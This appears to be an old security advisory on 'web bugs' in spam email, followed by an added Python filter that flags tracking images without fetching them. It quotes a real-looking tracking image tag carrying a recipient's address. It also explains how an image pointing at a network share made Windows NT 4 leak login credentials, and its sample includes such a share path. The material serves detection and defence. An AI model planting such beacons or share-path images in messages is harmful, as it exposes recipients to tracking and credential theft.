COMMAND

    HTML

SYSTEMS AFFECTED

    HTML

PROBLEM

    Alex Prestin found the following.  You may have heard of "web
    bugs" before, or you may not have.  For the benefit of the
    less-experienced, here's what they are and what they do.

    "Web  bugs"  are  small,  1x1  (or  similar-sized) transparent GIF
    images which can be  used to track the  movement of a user  around
    the web.  About  1 in 10 sites  use them.  Their  effectiveness at
    this task  is somewhat  questionable, but  they can  be used  more
    effectively for a different task.

    Alex started  noticing something  very disturbing  in the  HTML in
    spam mails recently.   He started seeing  web bugs.   Below is  an
    example from a recent email:

        <img src="http://www.megahardcoresex.com/sites/XXXXXXXX03b/sf03b08152001.gif?M=XXXXXXXXX&ID=wakko@bitey.net" width="1" height="1">

    See it?  A web bug.  If you opened this mail in an HTML-capable
    browser, that little image would've popped up and you would've
    been none the wiser.  Your address would also have been verified
    by the sender, and stored in a large database of valid recipients.

    And if you were running WinNT 4 and that reference pointed to a
    server advertising a share, NT would send your username and
    password to try to log you on without your knowledge.  It could
    be grabbed and sent back to your machine to log on, and the
    attacker would have all the rights to your machine and network
    that the ID you're using has.

SOLUTION

    This is a client-side problem that needs to be addressed in the
    mail client.  For example, Kmail - the KDE Mailer - has a
    "download remote URLs" checkbox.  Simply turning that off stops
    HTML mail messages from activating things like <img> tags.

    Under Outlook, this isn't possible, but there are some things  you
    can do...

    In Outlook, you can use Message Rules to move emails with
    "Content-Type: text/html;"/"Content-Type: multipart/alternative;"
    to an HTML folder.  This move does not 'preview' the mail, and
    links are not parsed.  When you get a few HTML mails in your
    special folder, just disable the firewall client (preventing
    outbound connections) and view the mail.  If you get HTML mail
    internally, you can allow that into your Inbox with some more
    creative rules.
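
    A filter can also inspect the HTML itself instead of sorting on
    Content-Type alone.  The following is an added example, not part
    of the original advisory: it flags <img> tags that are tiny, carry
    the recipient's address, or point at a share path, without
    fetching anything.  The names WebBugFinder and find_web_bugs, the
    2-pixel threshold and the sample message are assumptions.

```python
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import unquote

def _px(value):  # width/height attribute as int, or None if absent or non-numeric
    text = (value or "").strip()
    return int(text) if text.isdecimal() else None

class WebBugFinder(HTMLParser):
    """Collects <img> tags that would beacon to a remote host when rendered."""
    def __init__(self, recipient):
        super().__init__()
        self.recipient = recipient.lower()
        self.findings = []  # (src, [reasons]) per suspicious image

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        a = dict(attrs)
        src = (a.get("src") or "").strip()
        scheme = src.split(":", 1)[0].lower() if ":" in src else ""
        reasons = []
        if src.startswith("\\\\") or scheme == "file":
            reasons.append("share-path")  # fetching it can trigger a Windows logon attempt
        elif scheme in ("http", "https"):
            w, h = _px(a.get("width")), _px(a.get("height"))
            if w is not None and h is not None and w <= 2 and h <= 2:
                reasons.append("tiny-image")  # assumed threshold: up to 2x2 pixels
            if self.recipient and self.recipient in unquote(src).lower():
                reasons.append("recipient-in-url")
        if reasons:
            self.findings.append((src, reasons))

def find_web_bugs(raw_message, recipient):
    """Scan every text/html part of a raw message; nothing is fetched."""
    finder = WebBugFinder(recipient)
    for part in message_from_string(raw_message).walk():
        if part.get_content_type() == "text/html":
            body = part.get_payload(decode=True) or b""
            finder.feed(body.decode(part.get_content_charset() or "utf-8", "replace"))
    finder.close()
    return finder.findings

SAMPLE = (  # constructed message, not taken from the advisory
    'To: alice@example.org\nMIME-Version: 1.0\nContent-Type: text/html\n\n'
    '<img src="http://tracker.example/t.gif?id=alice@example.org" width="1" height="1">\n'
    '<img src="http://static.example/logo.png" width="120" height="40">\n'
    '<img src="\\\\fileserver.example\\share\\x.gif">\n'
)
```

    Messages with any finding can be routed to the quarantine folder
    described above; ordinary remote images such as the logo in the
    sample are not flagged.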